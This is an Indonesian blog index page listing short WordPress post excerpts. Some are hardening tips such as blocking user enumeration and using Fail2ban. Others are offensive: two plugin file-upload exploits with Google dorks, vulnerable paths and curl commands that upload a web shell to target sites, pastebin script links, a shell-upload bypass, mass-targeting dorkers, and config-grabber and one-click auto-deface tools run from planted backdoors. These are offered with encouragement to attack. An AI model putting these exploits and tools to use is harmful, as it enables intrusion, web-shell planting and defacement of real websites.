Scan Kode Plugin WordPress dengan WPSploit - Kali ini saya bakal sharing tips seputar WordPress. WPSploit adalah tools yang ditulis dengan bahasa python dan difungsikan untuk melakukan scanning terhadap source code...
Halo teman teman kembali lagi bersama saya, kali ini saya akan memberikan tuturial cara menghilangkan permalink /blog/ pada website bawaan yang baru di install wordpress, permalink tersebut sudah ada sejak teman...
Blokir WordPress User Enumeration dengan Nginx - Memblokir enumerasi username merupakan upaya untuk mencegah terjadinya peretasan di blog atau cms WordPress. Karena jika attacker berhasil mendapatkan daftar username di WordPress, kesempatan...
Mengubah Struktur Permalink WordPress di Nginx - Sebenernya ini sekalian saya jadikan arsip atau cacatan pribadi soalnya tadi hampir sejam ngotak atik nginx rule biar permalink lawas di redirect ke permalink...
Cara Menyembunyikan Versi WordPress Yang Terinstall - Menyembunyikan versi WordPress yang kita install merupakan langkah pencegahan jika sewaktu waktu versi WordPress yang kita install terdapat celah atau bug. Karena scanner seperti...
Exploit Title: WordPress Plugin Job Manager File UploadGoogle Dork: inurl:/wp-content/uploads/job-manager-uploads/Vuln Path: /jm-ajax/upload_fileExample:www.target.com/jm-ajax/upload_file/( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"Upload file anda dengan format .gif/.jpg/.pngScript:- https://pastebin.com/hp0jJr1g [PHP][CLI Based]- https://pastebin.com/FaACEDLg [BASH]Ayo kawan kita boom...
Exploit Title: WordPress Business Directory Plugin File UploadAuthor: Jingklong ( Bahari Trouble Maker )Google Dork: inurl:/wp-content/ inurl:/business-directory-pluginVuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-uploadExample Target:http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"Uplod file...
Kali ini saya akan membahas seputar optimasi WordPress. Yup, seperti judulnya, kali ini kita membahas mengenai cara menonaktifkan wp-cron. Sekedar informasi, wp-cron adalah cronjob bawaan WordPress. Karena fungsinya sebagai ronjob maka...
Menampilkan Number of Queries dan Page Load Time di WordPress - Kali ini saya akan membagikan artikel tentang bagaimana cara menampilkan jumlah queries pada CMS WordPress. Barangkali diantara kalian ada yang...
Hallo.. kali ini saya akan membagi sedikit tips mengenai tweak security bagi kalian yang menggunakan cms wordpress. Pada tutorial kali ini kita akan membahas mengenai menghilangkan login hints saat login ke...
Serangan bruteforce termasuk serangan yang cukup berbahaya apalagi jika attacker dibiarkan bebas melakukan percobaan login hingga ribuan kali. Nah kali ini saya akan menulis tutorial bagaimana menangkal bruteforce menggunakan Fail2ban. Cara...
Hai semuanya, udah lama banget ngk buat tutor. Gw udh mulai bosen dgn semua ini. Makanya gw pengen share Tools yang menurut gw manteb untuk maen bot - botan..Cara kerja tools...
*nb: Diperuntukan buat yang udah ada shellini cocok banget buat yg pengen menemukan bug baru di plugins atau themes wordpress atau joomla.bukan menemukan bug baru sih, tapi menemukan file yang ada...
Okee kali ini gua akan bahas gimana caranyaaa mem-bypass shell kitaa, agar bisa terupload di exploit jquery file uploadokee ini dia contoh web nyaaa.Waktu mau kita upload shell kita dengan ekstensi...
Okee gannn, kyknyaa ini exploit lagi booming banget yaaaaa. freshhhhThankss buat . // Res7ock - Aan INCEF buat live targetnyaaaa :D Ikutin aja kyk di ss gannn.disini script nyaaaa -> http://pastebin.com/9SCkGP3h...
Lansunggg aja gannn sedott sourcenyaaaa:http://pastebin.com/t8PvtP0hCara Pake nyaa: 1. Masukin Toolsnya Ke Shell Backdoor / Hosting2. Masukin Targetnya kyk di SS ganIni Google Dorker WP U-Design nya gan biar ga cape cari...
Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.jadi misalnya lu grab configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini...
kali ini ane pengen share cara mengetahui username pada wordpress.ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.cukup simple sih.cuma menambahkan ?author=idnanti akan muncul username + namenya.pada kali ini cuma menampilkan...
kali ini ane ingin share gabungan dari tools ane.tinggal klik - klik doang.Tools:Jumping (Cuma liat Dir yg readable)Config grabber Wordpress dan Joomla.Auto deface site cms joomla. (jadi setelah dapat config yang...
Config and Auto Deface in Wordpress..ngk usah capek2 untuk nyari config + masuk ke database, ganti u\p admin, login, nanem shell, deface..karena semua fitur itu ada di tool ini..cuma 1x klik......
